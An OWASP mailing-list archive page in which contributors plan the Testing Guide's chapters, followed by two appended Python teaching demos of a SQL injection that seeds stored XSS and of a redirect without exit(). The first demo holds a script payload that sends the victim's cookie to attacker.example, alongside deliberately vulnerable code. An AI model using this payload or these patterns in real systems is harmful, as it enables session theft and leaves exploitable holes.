[Owasp-testing] Brainstorming about the new Index

Daniel Cuthbert daniel.cuthbert at owasp.org
Fri Oct 13 10:20:53 EDT 2006


Nope, seems something isn't happy with our version of the wiki and Mac
support.

Andrew, you use a Mac, have you seen this before?
On 13 Oct 2006, at 20:11, Eoin wrote:

> Yep, had this before, don't turn on "remember me" and clear your cache.
> That seems to solve the problem.
>
> On 13/10/06, Daniel Cuthbert <daniel.cuthbert at owasp.org> wrote:
> Anyone else having an issue with the Wiki?
> Seems once I go through the authentication process, the site returns
> a blank page.
>
> confused!
> On 13 Oct 2006, at 18:10, Matteo Meucci wrote:
>
> > I've talked about "4.2 Information Gathering" and "4.8 Infrastructure
> > and configuration Testing" with Carlo and Stefano.
> > (http://www.owasp.org/index.php/
> > OWASP_Testing_Guide_v2_Table_of_Contents)
> >
> > Maybe we can merge these like this (deleting par. 4.8):
> >
> > 4.2 Information Gathering
> > 4.2.1 Spidering and googling
> > 4.2.2 Analysis of error codes
> > 4.2.3 Infrastructure configuration management testing
> >       SSL/TLS Testing
> > 4.2.4 Application configuration management testing
> >       File extensions handling
> >       Old, backup and unreferenced files
> >
> > What is your opinion?
> > Mat
> >
> >
> > On 10/13/06, Matteo Meucci <matteo.meucci at gmail.com> wrote:
> >> Perfect.
> >> Thank you Stefano, I've added:
> >> 4.4.4 Directory traversal/file include
> >>
> >> What about your second idea...where can we insert this item?
> >>
> >> Mat
> >>
> >> On 10/13/06, Stefano Di Paola <wisec at wisec.it> wrote:
> >>> Just a couple of things that come to my mind (thanks to Matteo and
> >>> Alberto)...
> >>>
> >>> The Data Validation Testing chapter is missing a short paragraph about
> >>> directory traversal/local file include and remote file include.
> >>>
> >>> Another point is about the authentication and authorization chapter:
> >>> pages which fail to exit after a redirection when they find the
> >>> login/password are wrong.
> >>> An example below in PHP:
> >>> <?php
> >>> if (!islogged())
> >>>     header("Location: redir.php");
> >>> // without exit(): the login page follows for the user, but the
> >>> // script keeps running and the logged-in code below still executes
> >>> // logged-in code...
> >>> ?>
> >>>
> >>> Maybe in these cases a paragraph is worth writing to cover the issue
> >>> and to point out the use of command-line raw requests with curl and
> >>> related tools.
> >>>
> >>> Stefano
> >>>
> >>>
> >>>
> >>> On gio, 2006-10-12 at 11:51 +0200, Matteo Meucci wrote:
> >>>> Yes,
> >>>> I think you are right: this paragraph already exists.
> >>>> look at:
> >>>> (http://www.owasp.org/index.php/
> >>>> OWASP_Testing_Guide_v2_Table_of_Contents)
> >>>> 4.6 Data Validation Testing 0% TD
> >>>> 4.6.1 Cross site scripting 0% TD
> >>>> 4.6.1.1 Incubated attacks 0% TD
> >>>>
> >>>> Ariel maybe says that incubated attacks are a combination of SQL
> >>>> injection and XSS, but we can reasonably affirm that it is a
> >>>> particular XSS attack.
> >>>> In the same paragraph we can show an example of how an incubated
> >>>> XSS attack works by exploiting an SQL injection vulnerability.
> >>>> Right?
> >>>>
> >>>> Mat
> >>>>
> >>>>
> >>>>
> >>>> On 10/12/06, Eoin <eoinkeary at gmail.com> wrote:
> >>>>> Hi,
> >>>>> incubated attacks are important enough to warrant a section
> >>>>> under XSS. It is another variant of XSS.
> >>>>> Matteo, what do you think?
> >>>>>
> >>>>>
> >>>>>
> >>>>> On 11/10/06, Ariel Waissbein <wata.34mt at coresecurity.com> wrote:
> >>>>>> Hi all,
> >>>>>>
> >>>>>> my first post and 2 cents here:
> >>>>>>
> >>>>>> I guess we should distinguish between the techniques of unit
> >>>>>> testing and the results of UT, even if UT can be used to, e.g.,
> >>>>>> discover BO or SQL-injection vulns.
> >>>>>>
> >>>>>> Also, I noticed that there is an appendix for fuzzing, which is
> >>>>>> another technique for discovering (some) vulnerabilities.
> >>>>>>
> >>>>>>
> >>>>>> A new question: imagine the following situation: the pen tester
> >>>>>> discovers a SQL-injection vulnerability in a webapp he is
> >>>>>> auditing. This vuln. allows him to store some JavaScript in the
> >>>>>> DB and therefore perpetrate an XSS attack (incubated) on the users
> >>>>>> of this webapp. My question is where do we describe these attacks?
> >>>>>> (I think they are important enough to be included somewhere.)
> >>>>>>
> >>>>>> Cheers,
> >>>>>> Ariel
> >>>>>>
> >>>>>> Eoin Keary wrote:
> >>>>>>> Hi,
> >>>>>>>
> >>>>>>> Question:
> >>>>>>> Do we want to get into unit testing and SDLC methodology in
> >>>>>>> this guide?
> >>>>>>> I thought they would be more suited to Andrew's dev guide or
> >>>>>>> the code review project.
> >>>>>>> Unit testing is related to testing small blocks of a system
> >>>>>>> individually and hence is a development phase done prior to
> >>>>>>> system and integration testing.
> >>>>>>> The Guide currently focuses on penetration testing, which is
> >>>>>>> "after the fact" testing and not really done until the system
> >>>>>>> is developed.
> >>>>>>>
> >>>>>>> What y'all think?
> >>>>>>>
> >>>>>>> Eoin
> >>>>>>>
> >>>>>> _______________________________________________
> >>>>>> Owasp-testing mailing list
> >>>>>> Owasp-testing at lists.owasp.org
> >>>>>> http://lists.owasp.org/mailman/listinfo/owasp-testing
> >>>>>>
> >>>>>
> >>>>>
> >>>>>
> >>>>> --
> >>>>> Eoin Keary OWASP - Ireland
> >>>>> http://www.owasp.org/local/ireland.html
> >>>>>  http://www.owasp.org/index.php/OWASP_Testing_Project
> >>>>> http://www.owasp.org/index.php/OWASP_Code_Review_Project
> >>>>>
> >>>>>
> >>>>>
> >>>>
> >>>
> >>>
> >>>
> >>
> >>
> >> --
> >> Matteo Meucci
> >> OWASP-Italy Chair, CISSP, CISA
> >> site: http://www.owasp.org/index.php/Italy
> >> mail: matteo.meucci at owasp.org
> >> ml: http://lists.owasp.org/mailman/listinfo/owasp-italy
> >>
> >
> >
> > --
> > Matteo Meucci
> > OWASP-Italy Chair, CISSP, CISA
> > site: http://www.owasp.org/index.php/Italy
> > mail: matteo.meucci at owasp.org
> > ml: http://lists.owasp.org/mailman/listinfo/owasp-italy
>
>
>
>
> -- 
> Eoin Keary OWASP - Ireland
> http://www.owasp.org/local/ireland.html
> http://www.owasp.org/index.php/OWASP_Testing_Project
> http://www.owasp.org/index.php/OWASP_Code_Review_Project
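
Added example, not from the thread or from the OWASP Testing Guide: the scenario Ariel describes, a SQL injection used to seed an incubated (stored) XSS, in Python against an in-memory SQLite database. The comments table, the tag-stripping input filter, the attacker strings and the attacker.example collector URL are all constructed for this demo. The vulnerable application strips tags from the comment body on the way in and therefore trusts whatever comes back out of the database, but it concatenates the author field (only length-checked) into the INSERT, so the attacker uses that field to write a body of his own choosing, which then sits in the table until a victim views the page. The hardened version parameterises the statement and escapes at output time.

```python
import html
import re
import sqlite3

# Constructed for this demo: the app's input filter for comment bodies.
TAG_RE = re.compile(r"<[^>]*>")

# Hypothetical collector URL; the script ships the victim's cookie to the attacker.
JS = '<script>new Image().src="http://attacker.example/c?"+document.cookie</script>'

# Attacker's "author" value: closes the VALUES tuple with a raw body of his own
# and comments out the application's filtered body that follows in the statement.
INJECTED_AUTHOR = "mallory', '" + JS + "') -- "


def strip_tags(text):
    """The app's input filter: drops anything that looks like an HTML tag."""
    return TAG_RE.sub("", text)


def new_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE comments (author TEXT, body TEXT)")
    return db


def post_comment_vulnerable(db, author, body):
    """Filters the body, then builds the INSERT by string formatting: the
    author value is only length-checked and lands in the SQL text as-is."""
    if len(author) > 200:
        raise ValueError("author too long")
    sql = "INSERT INTO comments (author, body) VALUES ('%s', '%s')" % (
        author, strip_tags(body))
    db.execute(sql)
    db.commit()


def render_vulnerable(db):
    """Trusts stored rows because 'they were filtered on the way in'."""
    rows = db.execute("SELECT author, body FROM comments ORDER BY rowid").fetchall()
    return "\n".join("<p><b>%s</b>: %s</p>" % (a, b) for a, b in rows)


def post_comment_fixed(db, author, body):
    """Parameterised statement: attacker text can never change the SQL."""
    if len(author) > 200:
        raise ValueError("author too long")
    db.execute("INSERT INTO comments (author, body) VALUES (?, ?)", (author, body))
    db.commit()


def render_fixed(db):
    """Escape at output time regardless of what the database holds."""
    rows = db.execute("SELECT author, body FROM comments ORDER BY rowid").fetchall()
    return "\n".join("<p><b>%s</b>: %s</p>" % (html.escape(a), html.escape(b))
                     for a, b in rows)


def demo(vulnerable):
    """Seed the table with one honest comment and one injected one, then render
    the page as a victim would receive it. Returns the page and the stored rows."""
    db = new_db()
    post, render = ((post_comment_vulnerable, render_vulnerable) if vulnerable
                    else (post_comment_fixed, render_fixed))
    post(db, "alice", "first <b>post</b>")   # legitimate user
    post(db, INJECTED_AUTHOR, "hello")        # attacker; "hello" is all the filter sees
    rows = db.execute("SELECT author, body FROM comments ORDER BY rowid").fetchall()
    return {"page": render(db), "rows": rows}


def script_present(page):
    """True when a live <script> element reaches the browser."""
    return "<script>" in page


if __name__ == "__main__":
    for flag in (True, False):
        d = demo(flag)
        print("vulnerable" if flag else "fixed", "script delivered:", script_present(d["page"]))
        print(d["page"])
```

In the vulnerable run the injected row is stored as author "mallory" with the unfiltered script as its body, and the page hands that script to every later viewer; the attacker never had to get a tag past the input filter, which is why output encoding has to be applied on the way out even for data the application believes it cleaned on the way in.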

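Added example, not from the thread: a way to test for the "header() without exit()" bug Stefano describes, using a raw HTTP request that does not follow redirects. Two stand-in servers are constructed with Python's http.server on an ephemeral localhost port (they are not the wiki or any real application); the cookie value session=valid, the paths /admin.php and /login.php and the "Admin panel" marker are assumptions of the demo. The vulnerable handler issues the 302 and then keeps going, exactly like PHP that calls header("Location: ...") without exit, so the protected markup is shipped as the body of the redirect; a browser follows the Location header and never shows it, which is why the check has to look at the raw response.

```python
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed sample of content that only a logged-in user should ever receive.
PROTECTED_BODY = b"<h1>Admin panel</h1>\n<p>Users: alice, bob, carol</p>\n"
MARKER = b"Admin panel"


class _Base(BaseHTTPRequestHandler):
    protocol_version = "HTTP/1.0"

    def log_message(self, *args):  # keep the demo quiet
        pass

    def _is_logged_in(self):
        # Stand-in for islogged(): a fixed cookie value marks a valid session (assumption).
        return self.headers.get("Cookie") == "session=valid"

    def _send(self, status, body, location=None):
        self.send_response(status)
        if location is not None:
            self.send_header("Location", location)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)


class VulnerableHandler(_Base):
    """header("Location: ...") with no exit(): the redirect is sent, execution
    continues, and the protected page is generated as the body of the 302."""

    def do_GET(self):
        status, location = 200, None
        if not self._is_logged_in():
            status, location = 302, "/login.php"
            # missing exit(): nothing stops the protected code below from running
        self._send(status, PROTECTED_BODY, location)


class FixedHandler(_Base):
    """Same check, but execution stops once the redirect has been issued."""

    def do_GET(self):
        if not self._is_logged_in():
            self._send(302, b"", "/login.php")
            return  # the exit() the vulnerable version lacks
        self._send(200, PROTECTED_BODY)


def start_server(handler):
    """Bind to an ephemeral localhost port and serve in a daemon thread."""
    server = HTTPServer(("127.0.0.1", 0), handler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


def raw_get(port, path="/admin.php", cookie=None):
    """One raw request. http.client never follows redirects, which is the point:
    we want to see exactly what the server wrote back, headers and body."""
    conn = http.client.HTTPConnection("127.0.0.1", port, timeout=5)
    headers = {"Cookie": cookie} if cookie else {}
    conn.request("GET", path, headers=headers)
    resp = conn.getresponse()
    body = resp.read()
    conn.close()
    return resp.status, resp.getheader("Location"), body


def leaks_after_redirect(status, location, body, marker=MARKER):
    """True when the server redirects (3xx plus Location) yet the body still
    carries content that should only exist for an authenticated user."""
    return 300 <= status < 400 and location is not None and marker in body


def check(handler, cookie=None):
    """Probe one handler (unauthenticated unless a cookie is given) and report."""
    server = start_server(handler)
    try:
        status, location, body = raw_get(server.server_address[1], cookie=cookie)
        return {"status": status, "location": location, "body": body,
                "leaks": leaks_after_redirect(status, location, body)}
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    for name, h in (("vulnerable", VulnerableHandler), ("fixed", FixedHandler)):
        r = check(h)
        print(name, r["status"], r["location"], "leaks:", r["leaks"])
```

The same probe from the command line is `curl -s -i http://target/admin.php` (curl does not follow redirects unless given -L, and -i prints the status line and headers before the body): if application markup appears below the 302 headers, the redirect is not protecting anything, and the same request with a valid session cookie confirms which content was supposed to be gated. The check is only meaningful on the raw response, since any client that honours Location will discard the leaked body.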
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.owasp.org/pipermail/owasp-testing/attachments/20061013/1beea150/attachment-0002.html 


More information about the Owasp-testing mailing list